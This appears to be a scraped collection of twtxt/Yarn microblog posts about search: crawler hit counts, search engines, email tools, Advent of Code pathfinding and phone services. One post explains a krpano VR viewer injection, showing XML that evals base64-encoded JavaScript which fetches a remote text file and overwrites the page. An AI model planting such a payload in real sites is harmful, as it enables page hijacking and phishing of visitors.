reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:
- (810) bingbot
- (641) Googlebot
- (624) http://www.google.com/bot.html
- (545) DotBot
- (290) GPTBot
- (106) SemrushBot
- (84) AhrefsBot
- (62) MJ12bot
- (60) BLEXBot
- (55) wpbot
- (37) Amazonbot
- (28) YandexBot
- (22) ClaudeBot
- (19) AwarioBot
- (14) https://domainsbot.com/pandalytics
- (9) https://serpstatbot.com
- (6) t3versionsBot
- (6) archive.org_bot
- (6) Applebot
- (5) http://search.msn.com/msnbot.htm
- (4) http://www.googlebot.com/bot.html
- (4) Googlebot-Mobile
- (4) DuckDuckGo-Favicons-Bot
- (3) https://turnitin.com/robot/crawlerinfo.html
- (3) YandexNews
- (3) ImagesiftBot
- (2) Qwantify-prod
- (1) http://www.google.com/adsbot.html
- (1) http://gais.cs.ccu.edu.tw/robot.php
- (1) YaK
- (1) WBSearchBot
- (1) DataForSeoBot
i have placed some middleware to reject these for now but it is not a full proof solution.
Well, thatās another bug: The search https://twtxt.net/search?q=%22LOOOOL%2C+great+programming+tutorial+music%22 yields the wrong hash. It should have been poyndha instead.
Reading āManās search for meaningā by Viktor E. Frankl
Unit Circle
ā Read more
@slashdot@feeds.twtxt.net Who the F+++ still uses gooās search engine anyway xD Shout out to all my homies hosting a Searx instance šš¤
Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to ābetter protectā Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with ⦠ā Read more
Google Begins Requiring JavaScript For Google Search
Google says it has begun requiring users to turn on JavaScript, the widely-used programming language to make web pages interactive, in order to use Google Search. From a report: In an email to TechCrunch, a company spokesperson claimed that the change is intended to ābetter protectā Google Search against malicious activity, such as bots and spam, and to improve the over ⦠ā Read more
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
@lime360@lime360.nekoweb.org Down at the moment due to hardware failure of one of my nodes. I have the spare parts to bring it back online, just need to find the time š Sorry for the inconvenience, I just canāt afford to run the search engine right now on the remaining two nodes š¢š¢
@prologic@twtxt.net uhhh what happened to search.twtxt.net
@prologic@twtxt.net uhhh what happened to search.twtxt.net
@prologic@twtxt.net uhhh what happened to search.twtxt.net
nice! would you mind elaborating a bit?
Is that the scientific method?
I couldnāt find anything related when I searched for it.
@andros@twtxt.andros.dev Sorry I missed your messages to #twtxt on IRC. There are people there, but it can take several hours to get a response. E.g. I check it every day or two. I recommend using an IRC bouncer. To answer your question about registries, I used a couple of registries when I first started out, to try to find feeds to follow, but havenāt since then. I donāt remember which ones, but they were easy to find with web searches.
@prologic@twtxt.net Is it possible to interact with twtxt.net from outside? For example, an search API
Remembered about one ISP which disallow IRC stuff on his servers. By searching i found what itās many ISPās which equals IRC to proxy and doorways. This is unfair!
clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi
clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi
clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi
⦠it even shows @sorenpeter@darch.dkās article from 2020 in search results 
@prologic@twtxt.net I cannot⦠believe⦠It took me a āSingle Search Queryā to get HOOKED!! 𤩠Bonus: tried it from terminal too and it works just š
Behold ⦠āMarginaliaā ! My new favorite search engine!! And I have @mattof to thank for this find. Hereās their Blog post about it since I donāt think I could do a better job describing what it is. but, tl;dr: itās a #smallweb focused search engine.
The web is such garbage these days š Or is it the garbage search engines? š¤
@Codebuzz@www.codebuzz.nl I have separate mail boxes for private and work, but flattened both to have a simpler structure. For work, where we use Outlook, I am using categories for organising the mails and privately I am using Vivaldiās labels system. The main idea is to use search and grouping through dynamic saved searches instead of static folders.
So Iāve flattened my work and private email inboxes to single inbox folders and I donāt even know anymore what I was thinking before trying frantically to organise everything in sub folders. Labels and search filters are the way forward.
I share I did write up an algorithm for it at some point I think it is lost in a git comment someplace. Iāll put together a pseudo/go code this week.
Super simple:
Making a reply:
- If yarn has one use that. (Maybe do collision check?)
- Make hash of twt raw no truncation.
- Check local cache for shortest without collision
- in SQL:
select len(subject) where head_full_hash like subject || '%'
- in SQL:
Threading:
- Get full hash of head twt
- Search for twts
- in SQL:
head_full_hash like subject || '%' and created_on > head_timestamp
- in SQL:
The assumption being replies will be for the most recent head. If replying to an older one it will use a longer hash.
Diving into mblaze, I think Iāve nearly* reached peek email geek.
Just a bunch of shell commands I can pipe together to search, list, view and reply to email (after syncing it to a local Maildir).
EXAMPLES at https://git.vuxu.org/mblaze/tree/README
So far Iām using most of the tools directly from the command line, but I might take inspiration from https://sr.ht/~rakoo/omail/ to make my workflow a bit more efficient.
*To get any closer, I think Iād have to hand-craft my own SMTP client or something.
@movq@www.uninformativ.de Yes, the tools are surprisingly fast. Still, magrep takes about 20 seconds to search through my archive of 140K emails, so to speed things up I would probably combine it with an indexer like mu, mairix or notmuch.
So Iām a location based system, how exactly do I reply to one of these two Twts from @Yarns@search.twtxt.net ? š¤
2024-09-07T12:55:56Z š„³ NEW FEED: @<twtxt http://edsu.github.io/twtxt/twtxt.txt>
2024-09-07T12:55:56Z š„³ NEW FEED: @<kdy https://twtxt.kdy.ch/twtxt.txt>
@falsifian@www.falsifian.org comments on the feeds as in nick, url, follow, that kind of thing? If that, then not interested at all. I envision an archive that would allow searching, and potentially browsing threads on a nice, neat interface. You will have to think, though, on other things. Like, what to do with images? Yarn allows users to upload images, but also embed it in twtxts from other sources (hotlinking, actually).
@prologic@twtxt.net I believe you when you say registries as designed today do not crawl. But when I first read the spec, it conjured in my mind a search engine. Now I donāt know how things work out in practice, but just based on reading, I donāt see why it canāt be an API for a crawling search engine. (In fact I donāt see anything in the spec indicating registry servers shouldnāt crawl.)
(I also noticed that https://twtxt.readthedocs.io/en/latest/user/registry.html recommends āThe registries should sync each others user list by using the users endpointā. If I understood that right, registering with one should be enough to appear on others, even if they donāt crawl.)
Does yarnd provide an API for finding twts? Is it similar?
@prologic@twtxt.net I guess I thought they were search engines. Anyway, the registry API looks like a decent one for searching for tweets. Could/should yarn.social pods implement the same API?
@prologic@twtxt.net Whatās the difference between search.twtxt.net and the /api/plain/tweets endpoint of a registry? In my mind, a registry is a twtxt search engine. Or are registries not supposed to do their own crawling to discover new feeds?
Never mind, I simply searched and deleted them all (D then ~f sender). :-) Phew!
s/(www\.)?youtube.com\/watch?v=([^?]+)/tubeproxy.mills.io/play/\1 for example? š¤
Have not tried any of them, but some of these seem to fit the bill:
@movq@www.uninformativ.de Iāve been using Qwant for a while but it was down earlier today (as well š) so I switched back to my trusty Searx Redirector
⦠This utility forwards your search query to one of 11 random volunteer-run public servers to thwart mass surveillance.
QOTD: Which web search engine do you use? š
Hah 𤣠@dfaria@twtxt.net Your @dfaria.eu@dfaria.eu feed really does consume about >50% of a āDiscoverā search with filters āWithout repliesā and āHide my postsā. š¤£
36/2 = 18 at 25 Twts per page, thatās about ~72% of the search/view real estate youāre taking up! wow 𤩠ā Iād be very interested to hear what ideas you have to improve this? Those search filters were created so you could sift through either your own Timeline or the Discover view easily.
Added support for #tag clouds and #search to timeline. Based on code from @dfaria.eu@dfaria.euš

Live at: http://darch.dk/timeline/?profile=https://darch.dk/twtxt.txt
On trouve de ces trucs⦠Là , plein de livres au format texte brut: https://github.com/ganesh-k13/shell/tree/master/test_search/www.glozman.com/TextPages
Google Chrome Gains AI Features Including a Writing Helper
Google is adding new AI features to Chrome, including tools to organize browser tabs, customize themes, and assist users with writing online content such as reviews and forum posts.
The writing helper is similar to an AI-powered feature already offered in Googleās experimental search experience, SGE, which helps users draft emails in various tones and lengths. W ⦠ā Read more
So, I finally got day 17 to under a second on my machine. (in the test runner it takes 10)
I implemented a Fibonacci Heap to replace the priority queue to great success.
https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go#L168-L268
OH MY FREAKING HECK. So.. I made my pather able to run as Dijkstra or A* if the interface includes a heuristic.. when i tried without the heuristic it finished faster :|
So now to figure out why its not working right.
man⦠day17 has been a struggle for me.. i have managed to implement A* but the solve still takes about 2 minutes for me.. not sure how some are able to get it under 10 seconds.
Solution: https://git.sour.is/xuu/advent-of-code/src/branch/main/day17/main.go
A* PathFind: https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go
some seem to simplify the seen check to only be horizontal/vertical instead of each direction.. but it doesnāt give me the right answer
The word forms is part two. In this one you want to find the first digit and last digit. Think searching ā1ā - ā9ā
I could have made my search smarter using a prefix search rather than scanning the full buffer for each iteration.
@prologic@twtxt.net I use the gmail webapp for work, and I have to say that over the years itās gotten less and less usable. There are so many little usability things that itās bad at. For instance, if you select a message and hit the Delete key nothing happens. The message is not put in the trash like youād expect. There are issues like that scattered all over the app. I suspect they spend most of their energy on the spyware side of gmail and dedicate less to making it a useful app for end users (which seems to be true of their search engine too).
@jmjl@tilde.green Iām sorry that Iām not super knowledgeable about alternatives to jmp.chat but Iāll tell you what I know.
Youāre probably right about jmp.chat not working for you, at least as it is now. You can only get US and Canadian phone numbers through it last time I checked, so if youāre not in either of those countries youād be making international calls all the time and people who wanted to call you would be making international calls too.
Iāve seen people talk about using SIP as an intermediary: you can bridge SIP-to-XMPP, and bridge SIP-to-PSTN (PSTN = āpacket switched telephone networkā, meaning normal telephone). You can skip the SIP-to-XMPP side if youāre comfortable using a SIP client. I donāt know very much about SIP or PSTN so I am not sure what to recommend, but perhaps this helps your search queries.
There are a fair number of services like TextNow that let you sign up for a real telephone number that you can then use via their app (I wouldnāt use TextNowāthey had tons of spyware in their app). I donāt know if that kind of service works for you but if it does perhaps youād be able to find one of them that isnāt horrible. This page (https://alternativeto.net/software/jmp-chat/) has a bunch of alternatives; I canāt vouch for any of them but maybe itās a starting point if you want to go this route.
Good luck!
@abucci@anthony.buc.ci Are you still with jmp.chat? If so, are you still as happy as you were before? Have you experienced any reliability issues, especially with receiving phone calls?